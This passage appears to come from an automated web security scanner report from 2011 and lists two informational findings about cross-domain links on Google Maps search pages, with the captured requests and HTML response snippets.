</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

16.20. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /maps?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=wl HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:03:12 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=52b22085a4970813:TM=1296694992:LM=1296694992:S=0_Or1WoIcTSpWJZS; expires=Sat, 02-Feb-2013 01:03:12 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=ipboard+software&um=1&ie=UTF-8&hl=en&sa=N&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img style="left:182px;top:11px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:200px;top:-9px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_ALL/mapfiles
...[SNIP]...
</div> <img style="left:200px;top:-9px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:1368px;top:-392px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_ALL/mapfi
...[SNIP]...
</div> <img style="left:1368px;top:-392px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:1073px;top:-215px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_ALL/mapfi
...[SNIP]...
</div> <img style="left:1073px;top:-215px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:208px;top:-31px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_ALL/mapfile
...[SNIP]...
</div> <img style="left:208px;top:-31px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:1084px;top:-218px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_ALL/mapfi
...[SNIP]...
</div> <img style="left:1084px;top:-218px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:203px;top:-74px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_ALL/mapfile
...[SNIP]...
</div> <img style="left:203px;top:-74px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:-225px;top:30px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_ALL/mapfile
...[SNIP]...
</div> <img style="left:-225px;top:30px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:-870px;top:629px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_ALL/mapfil
...[SNIP]...
</div> <img style="left:-870px;top:629px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:21px;top:-102px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_ALL/mapfile
...[SNIP]...
</div> <img style="left:21px;top:-102px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:0px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-68px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-102px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-136px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-170px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-204px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-238px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-272px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-306px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:108px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'A'" jstrack="0P5JTcGdGIPAzgTDx5nTDQ" ved=0CFwQ_gswAA id="marker_A_2"><img alt="A" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconA"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_3609683009569693284" jsaction="si.togglePanelStarring" jsprops="markerid:'A';b_s:2" data-authtoken="cba694d6:-ggD_Qb6yP310yHeX1yt-GBgB28" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'B'" jstrack="0P5JTcGdGIPAzgTDx5nTDQ" ved=0CGwQ_gswAQ id="marker_B_2"><img alt="B" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconB"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_12797690403372682105" jsaction="si.togglePanelStarring" jsprops="markerid:'B';b_s:2" data-authtoken="c9dc5525:9vHU-BOQy8u1u4COMqds_wHlJQY" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div> <img alt="Photo" title="Photo" class="pp-linked-photo bt btm" src="http://lh6.googleusercontent.com/public/XKVrW5NT5pO1AC_8Ogww-_Osu8Pf5E306p_JO1I5qIvIAk8F_OHvu5RwHT4E6lgiRknNCf_4DnAXU1HBmmvJ4uSb7k9Nl-XEprIixph-QA"/> </div>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'C'" jstrack="0P5JTcGdGIPAzgTDx5nTDQ" ved=0CHwQ_gswAg id="marker_C_2"><img alt="C" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconC"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_10583834036285344469" jsaction="si.togglePanelStarring" jsprops="markerid:'C';b_s:2" data-authtoken="48bf4f47:A0QQh7MDPqKRwMP1WJoVcEDX0N0" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'D'" jstrack="0P5JTcGdGIPAzgTDx5nTDQ" ved=0CIoBEP4LMAM id="marker_D_2"><img alt="D" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconD"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_1887082612188668062" jsaction="si.togglePanelStarring" jsprops="markerid:'D';b_s:2" data-authtoken="3b9a0694:oZi5I6Rl7ZwWZL9qbmgfjLkKNwM" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'E'" jstrack="0P5JTcGdGIPAzgTDx5nTDQ" ved=0CJoBEP4LMAQ id="marker_E_2"><img alt="E" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconE"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_8444820074866543685" jsaction="si.togglePanelStarring" jsprops="markerid:'E';b_s:2" data-authtoken="7935a9e7:gttgtht52SGAADtjpcgVoX97LZA" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div> <img alt="Photo" title="Photo" class="pp-linked-photo bt btm" src="http://lh4.googleusercontent.com/public/JKnw2YhvIZh7PrGiFyJWU9NQnuWMlIb3oBM01rs5xzZzb3fkRxyJsoc5YsXB7LTm2klXP43ZQjqBi8QyYmqsIIDaYrKqGIIUmBGggB0gAzKczGrPKvKOYZs0"/> </div>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'F'" jstrack="0P5JTcGdGIPAzgTDx5nTDQ" ved=0CKoBEP4LMAU id="marker_F_2"><img alt="F" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconF"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_17082642786933982593" jsaction="si.togglePanelStarring" jsprops="markerid:'F';b_s:2" data-authtoken="e3a2d524:wMkTPIFZQyyHhO3j-RuDmqDijnY" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'G'" jstrack="0P5JTcGdGIPAzgTDx5nTDQ" ved=0CLoBEP4LMAY id="marker_G_2"><img alt="G" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconG"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_12440291602333311596" jsaction="si.togglePanelStarring" jsprops="markerid:'G';b_s:2" data-authtoken="9af4b364:v0SUl3gmz0I3wYaOzK2hY9tFFa0" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div> <img alt="Photo" title="Photo" class="pp-linked-photo bt btm" src="http://lh5.googleusercontent.com/public/TSVOMC6SSZk5faClHY2cdmgS1CqBO1n8L33VzZBdMILTIcEy-5HmsWT6qdei4vy7rK2XhDa_fe3TAWOmhSQX3-C6ByHTVJC12Kq68PT0LrcRh7upB1KU0A"/> </div>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'H'" jstrack="0P5JTcGdGIPAzgTDx5nTDQ" ved=0CM0BEP4LMAc id="marker_H_2"><img alt="H" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconH"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_5885860110573554365" jsaction="si.togglePanelStarring" jsprops="markerid:'H';b_s:2" data-authtoken="dbd00a4d:pJ34g6XW9lAkwBAYKVboFjLckuE" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div> <img alt="Photo" title="Photo" class="pp-linked-photo bt btm" src="http://lh3.googleusercontent.com/public/NVI66qMFO6xKDd82CbJxy4R2kXCNj4PGk-5Uk4z6w0oLtKKbtNydfLMqR_UCTnaO9NXvW1Nr8GtbwIX6cqfb9hAS7sJv_wZcQYsjUJ4e0EN0uCFsK0qsxf49qiaGA4HYcNW7cVudEaOpLoSgh6202M_jx0IbYd1G4-gYsVjmZkOoQQ"/> </div>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'I'" jstrack="0P5JTcGdGIPAzgTDx5nTDQ" ved=0CN0BEP4LMAg id="marker_I_2"><img alt="I" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconI"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_3678539161023303363" jsaction="si.togglePanelStarring" jsprops="markerid:'I';b_s:2" data-authtoken="673f4b64:4tT9TZeVVUibepBLDmze6zK6TvY" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'J'" jstrack="0P5JTcGdGIPAzgTDx5nTDQ" ved=0COsBEP4LMAk id="marker_J_2"><img alt="J" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconJ"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_10510772924652340467" jsaction="si.togglePanelStarring" jsprops="markerid:'J';b_s:2" data-authtoken="9303d7d1:C86Vp3PEJ1-R4GbmJSDMIJwpRGs" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div><img class="btp bt noprint" src="http://lh6.googleusercontent.com/public/U6sJyykOVgeHuS3Mxm3v3ix4gi-JlM1K2nrdcuIrP-1enh-d8FfXcbXbK7yPNlEQVWRbJov62v2y7eJqD8Wz2fSxKjXkDpfbeKMu0YxtVQ" /><div>
...[SNIP]...
<div><img class="btp bt noprint" src="http://lh5.googleusercontent.com/public/0imdLhhy_9mvfQi8vGU8FrLCrr7SGF_Iew-Ghzv2AL16xNYmXcj65NKnHy0iY5E-GQfHmUZF32XkHKD6OpyKMdrkrOb3HSShDGwabYmnSdlU-oAIaZ_-SkhD" /><div>
...[SNIP]...
<div><img class="btp bt noprint" src="http://lh4.googleusercontent.com/public/1Pps-0cBUxwh-QYBX4N7NC-8PoL5JO7QiNjpZzNYkDDMrtJ3v9gEE3NKLWJwNwLDfz9-nsDIZjqaOKxexc-0tllSMrHfn2DClCk55F5C3Sj2Jw0_Q1ueZQ" /><div>
...[SNIP]...
<div><img class="btp bt noprint" src="http://lh4.googleusercontent.com/public/pF-MDB4Ir62loF6X5aYN7pRicgdX9NHfyhG42xqLzsNtEXmFqXMSwZQS5poiB2RU3Go68qLsbMhycs8I55wCRM3DgjFy30Ug2cgf5zXftMR12PsycGoHFOwGr7xYhgb4LMR4JCvmM541JOHuAy2YDPpaMqkz4hBH2kPAFL5MxLsBfA" /><div>
...[SNIP]...

16.21. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /maps?q=bluefin+tuna&hl=en&tab=nl HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:03:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=2757273b96d8f2b8:TM=1296694993:LM=1296694993:S=4gWIMW7EaUh_U2_C; expires=Sat, 02-Feb-2013 01:03:13 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=bluefin+tuna&hl=en&sa=N&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
